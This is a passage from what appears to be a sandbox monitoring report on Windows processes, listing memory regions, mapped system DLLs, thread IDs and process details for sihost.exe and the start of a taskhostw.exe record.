start_va = 0x7ff85e3c0000
end_va = 0x7ff85e402fff
monitored = 0
entry_point = 0x7ff85e3d4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2429
start_va = 0x7ff85ca20000
end_va = 0x7ff85ca46fff
monitored = 0
entry_point = 0x7ff85ca27940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2430
start_va = 0x7ff856490000
end_va = 0x7ff8564adfff
monitored = 0
entry_point = 0x7ff856491690
region_type = mapped_file
name = "bluetoothapis.dll"
filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll")
Region:
id = 2431
start_va = 0x5a0000
end_va = 0x5cdfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 2432
start_va = 0x7ff856d20000
end_va = 0x7ff856d2afff
monitored = 0
entry_point = 0x7ff856d21d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2466
start_va = 0x4200000
end_va = 0x42fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004200000"
filename = ""
Region:
id = 2467
start_va = 0x4300000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 2468
start_va = 0x4300000
end_va = 0x43fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 2469
start_va = 0x7ff85fae0000
end_va = 0x7ff85fb4afff
monitored = 0
entry_point = 0x7ff85faf90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2470
start_va = 0x7ff857ee0000
end_va = 0x7ff857fa7fff
monitored = 0
entry_point = 0x7ff857f213f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 2471
start_va = 0x7ff85d910000
end_va = 0x7ff85d96bfff
monitored = 0
entry_point = 0x7ff85d926f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2472
start_va = 0x7ff85cfe0000
end_va = 0x7ff85d003fff
monitored = 0
entry_point = 0x7ff85cfe3260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2503
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2504
start_va = 0x4400000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 2506
start_va = 0x7ff856c00000
end_va = 0x7ff856c15fff
monitored = 0
entry_point = 0x7ff856c019f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 2507
start_va = 0x7ff85cb60000
end_va = 0x7ff85cc09fff
monitored = 0
entry_point = 0x7ff85cb87910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2508
start_va = 0x7ff856be0000
end_va = 0x7ff856bf9fff
monitored = 0
entry_point = 0x7ff856be2430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 2509
start_va = 0x4500000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004500000"
filename = ""
Region:
id = 2511
start_va = 0x7ff8560b0000
end_va = 0x7ff8560b9fff
monitored = 0
entry_point = 0x7ff8560b14c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 2525
start_va = 0x570000
end_va = 0x571fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Thread:
id = 177
os_tid = 0x544
Thread:
id = 178
os_tid = 0x4b4
Thread:
id = 179
os_tid = 0x40c
Thread:
id = 180
os_tid = 0x188
Thread:
id = 181
os_tid = 0x184
Thread:
id = 182
os_tid = 0x180
Thread:
id = 183
os_tid = 0x120
Thread:
id = 184
os_tid = 0x11c
Thread:
id = 185
os_tid = 0x3e8
Thread:
id = 186
os_tid = 0x3c4
Thread:
id = 187
os_tid = 0x3bc
Thread:
id = 188
os_tid = 0x550
Thread:
id = 189
os_tid = 0x564
Thread:
id = 190
os_tid = 0x570
Thread:
id = 191
os_tid = 0x574
Thread:
id = 192
os_tid = 0x578
Thread:
id = 196
os_tid = 0x5b4
Thread:
id = 202
os_tid = 0x5e4
Thread:
id = 204
os_tid = 0x5ec
Process:
id = "10"
image_name = "sihost.exe"
filename = "c:\\windows\\system32\\sihost.exe"
page_root = "0x30922000"
os_pid = "0x588"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x360"
cmd_line = "sihost.exe"
cur_dir = "C:\\Windows\\system32\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2cf" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2417
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2418
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2419
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2420
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2421
start_va = 0xe0000
end_va = 0xe1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2422
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2423
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2424
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2425
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2426
start_va = 0x7ff7df9e0000
end_va = 0x7ff7df9f5fff
monitored = 0
entry_point = 0x7ff7df9e5190
region_type = mapped_file
name = "sihost.exe"
filename = "\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")
Region:
id = 2427
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2433
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2434
start_va = 0xf0000
end_va = 0x1adfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2435
start_va = 0x530000
end_va = 0x62ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2436
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2437
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2438
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2439
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2440
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2441
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2442
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2443
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2444
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2445
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2446
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2447
start_va = 0x7ff85d530000
end_va = 0x7ff85d560fff
monitored = 0
entry_point = 0x7ff85d537d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2448
start_va = 0x7ff85bfc0000
end_va = 0x7ff85c07dfff
monitored = 0
entry_point = 0x7ff85c002d40
region_type = mapped_file
name = "coremessaging.dll"
filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll")
Region:
id = 2449
start_va = 0x7ff856200000
end_va = 0x7ff856487fff
monitored = 0
entry_point = 0x7ff85625f670
region_type = mapped_file
name = "coreuicomponents.dll"
filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll")
Region:
id = 2450
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2451
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2452
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2453
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2454
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2455
start_va = 0x630000
end_va = 0x73ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 2456
start_va = 0x1b0000
end_va = 0x1b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2457
start_va = 0x1c0000
end_va = 0x1f8fff
monitored = 0
entry_point = 0x1c12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2458
start_va = 0x740000
end_va = 0x8c7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 2459
start_va = 0x7ff85f3a0000
end_va = 0x7ff85f3dafff
monitored = 0
entry_point = 0x7ff85f3a12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2460
start_va = 0x8d0000
end_va = 0xa50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008d0000"
filename = ""
Region:
id = 2461
start_va = 0xa60000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 2462
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2463
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2464
start_va = 0x630000
end_va = 0x70cfff
monitored = 0
entry_point = 0x68e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2465
start_va = 0x730000
end_va = 0x73ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000730000"
filename = ""
Region:
id = 2473
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2474
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2475
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2476
start_va = 0x7ff8560e0000
end_va = 0x7ff8560fdfff
monitored = 0
entry_point = 0x7ff8560e5340
region_type = mapped_file
name = "desktopshellext.dll"
filename = "\\Windows\\System32\\DesktopShellExt.dll" (normalized: "c:\\windows\\system32\\desktopshellext.dll")
Region:
id = 2477
start_va = 0x7ff8560c0000
end_va = 0x7ff8560d1fff
monitored = 0
entry_point = 0x7ff8560c5110
region_type = mapped_file
name = "windows.shell.servicehostbuilder.dll"
filename = "\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll" (normalized: "c:\\windows\\system32\\windows.shell.servicehostbuilder.dll")
Region:
id = 2478
start_va = 0x630000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 2479
start_va = 0x1e60000
end_va = 0x1f3cfff
monitored = 0
entry_point = 0x1ebe0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2483
start_va = 0x480000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2484
start_va = 0x1e60000
end_va = 0x1edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 2485
start_va = 0x1ee0000
end_va = 0x1f5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ee0000"
filename = ""
Region:
id = 2505
start_va = 0x1f60000
end_va = 0x1fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 2510
start_va = 0x7ff85b6b0000
end_va = 0x7ff85bb42fff
monitored = 0
entry_point = 0x7ff85b6bf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2512
start_va = 0x7ff855fd0000
end_va = 0x7ff8560a9fff
monitored = 0
entry_point = 0x7ff8560203b0
region_type = mapped_file
name = "modernexecserver.dll"
filename = "\\Windows\\System32\\modernexecserver.dll" (normalized: "c:\\windows\\system32\\modernexecserver.dll")
Region:
id = 2513
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2514
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2515
start_va = 0x7ff85cda0000
end_va = 0x7ff85cdc9fff
monitored = 0
entry_point = 0x7ff85cda8b90
region_type = mapped_file
name = "rmclient.dll"
filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll")
Region:
id = 2516
start_va = 0x7ff855f80000
end_va = 0x7ff855fcafff
monitored = 0
entry_point = 0x7ff855f97b70
region_type = mapped_file
name = "veeventdispatcher.dll"
filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll")
Region:
id = 2517
start_va = 0x7ff85cc10000
end_va = 0x7ff85cd0ffff
monitored = 0
entry_point = 0x7ff85cc50f80
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 2518
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2519
start_va = 0x7ff858b90000
end_va = 0x7ff858c21fff
monitored = 0
entry_point = 0x7ff858bda780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 2520
start_va = 0x1fe0000
end_va = 0x2122fff
monitored = 0
entry_point = 0x2008210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2521
start_va = 0x1fe0000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 2522
start_va = 0x500000
end_va = 0x501fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000500000"
filename = ""
Region:
id = 2523
start_va = 0x510000
end_va = 0x510fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 2524
start_va = 0x2060000
end_va = 0x213ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2553
start_va = 0x2140000
end_va = 0x21bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 2554
start_va = 0x7ff85c960000
end_va = 0x7ff85c9f5fff
monitored = 0
entry_point = 0x7ff85c985570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2555
start_va = 0x21c0000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021c0000"
filename = ""
Region:
id = 2590
start_va = 0x7ff855e40000
end_va = 0x7ff855e70fff
monitored = 0
entry_point = 0x7ff855e43400
region_type = mapped_file
name = "clipboardserver.dll"
filename = "\\Windows\\System32\\ClipboardServer.dll" (normalized: "c:\\windows\\system32\\clipboardserver.dll")
Region:
id = 2591
start_va = 0x7ff855de0000
end_va = 0x7ff855e3cfff
monitored = 0
entry_point = 0x7ff855df0080
region_type = mapped_file
name = "activationmanager.dll"
filename = "\\Windows\\System32\\ActivationManager.dll" (normalized: "c:\\windows\\system32\\activationmanager.dll")
Region:
id = 2598
start_va = 0x7ff855d10000
end_va = 0x7ff855d32fff
monitored = 0
entry_point = 0x7ff855d13020
region_type = mapped_file
name = "appointmentactivation.dll"
filename = "\\Windows\\System32\\AppointmentActivation.dll" (normalized: "c:\\windows\\system32\\appointmentactivation.dll")
Region:
id = 2617
start_va = 0x21f0000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 2621
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2622
start_va = 0x7ff857c70000
end_va = 0x7ff857cb0fff
monitored = 0
entry_point = 0x7ff857c74840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 2623
start_va = 0x2270000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002270000"
filename = ""
Region:
id = 2624
start_va = 0x7ff857ed0000
end_va = 0x7ff857edffff
monitored = 0
entry_point = 0x7ff857ed2c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 2625
start_va = 0x22f0000
end_va = 0x23effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022f0000"
filename = ""
Region:
id = 2626
start_va = 0x23f0000
end_va = 0x2beffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023f0000"
filename = ""
Region:
id = 2627
start_va = 0x2bf0000
end_va = 0x2c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002bf0000"
filename = ""
Region:
id = 2628
start_va = 0x2c70000
end_va = 0x2ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c70000"
filename = ""
Region:
id = 2629
start_va = 0x2cf0000
end_va = 0x2d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 2630
start_va = 0x7ff855800000
end_va = 0x7ff855843fff
monitored = 0
entry_point = 0x7ff85580c010
region_type = mapped_file
name = "execmodelclient.dll"
filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll")
Region:
id = 2633
start_va = 0x7ff858db0000
end_va = 0x7ff858dbdfff
monitored = 0
entry_point = 0x7ff858db2690
region_type = mapped_file
name = "notificationplatformcomponent.dll"
filename = "\\Windows\\System32\\notificationplatformcomponent.dll" (normalized: "c:\\windows\\system32\\notificationplatformcomponent.dll")
Region:
id = 2634
start_va = 0x7ff855760000
end_va = 0x7ff8557f6fff
monitored = 0
entry_point = 0x7ff855774fd0
region_type = mapped_file
name = "appcontracts.dll"
filename = "\\Windows\\System32\\AppContracts.dll" (normalized: "c:\\windows\\system32\\appcontracts.dll")
Region:
id = 2635
start_va = 0x7ff8556b0000
end_va = 0x7ff855751fff
monitored = 0
entry_point = 0x7ff8556b2b20
region_type = mapped_file
name = "sharehost.dll"
filename = "\\Windows\\System32\\ShareHost.dll" (normalized: "c:\\windows\\system32\\sharehost.dll")
Region:
id = 2636
start_va = 0x7ff85f4b0000
end_va = 0x7ff85f501fff
monitored = 0
entry_point = 0x7ff85f4bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2637
start_va = 0x7ff85e5a0000
end_va = 0x7ff85ebe3fff
monitored = 0
entry_point = 0x7ff85e7664b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 2638
start_va = 0x7ff85e3c0000
end_va = 0x7ff85e402fff
monitored = 0
entry_point = 0x7ff85e3d4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2639
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2640
start_va = 0x7ff8556a0000
end_va = 0x7ff8556a8fff
monitored = 0
entry_point = 0x7ff8556a1480
region_type = mapped_file
name = "wpportinglibrary.dll"
filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll")
Region:
id = 2641
start_va = 0x7ff855440000
end_va = 0x7ff85569cfff
monitored = 0
entry_point = 0x7ff8554c8610
region_type = mapped_file
name = "twinui.appcore.dll"
filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll")
Region:
id = 2701
start_va = 0x7ff8553a0000
end_va = 0x7ff8553b4fff
monitored = 0
entry_point = 0x7ff8553a1ab0
region_type = mapped_file
name = "execmodelproxy.dll"
filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll")
Region:
id = 2708
start_va = 0x2d70000
end_va = 0x2deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d70000"
filename = ""
Region:
id = 2714
start_va = 0x2df0000
end_va = 0x2e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002df0000"
filename = ""
Thread:
id = 194
os_tid = 0x58c
Thread:
id = 195
os_tid = 0x5ac
Thread:
id = 198
os_tid = 0x5c8
Thread:
id = 199
os_tid = 0x5d0
Thread:
id = 200
os_tid = 0x5d4
Thread:
id = 203
os_tid = 0x5e8
Thread:
id = 205
os_tid = 0x5f0
Thread:
id = 207
os_tid = 0x600
Thread:
id = 213
os_tid = 0x614
Thread:
id = 217
os_tid = 0x648
Thread:
id = 218
os_tid = 0x65c
Thread:
id = 219
os_tid = 0x660
Thread:
id = 220
os_tid = 0x66c
Thread:
id = 228
os_tid = 0x690
Thread:
id = 230
os_tid = 0x6a8
Process:
id = "11"
image_name = "taskhostw.exe"
filename = "c:\\windows\\system32\\taskhostw.exe"
page_root = "0x2f829000"
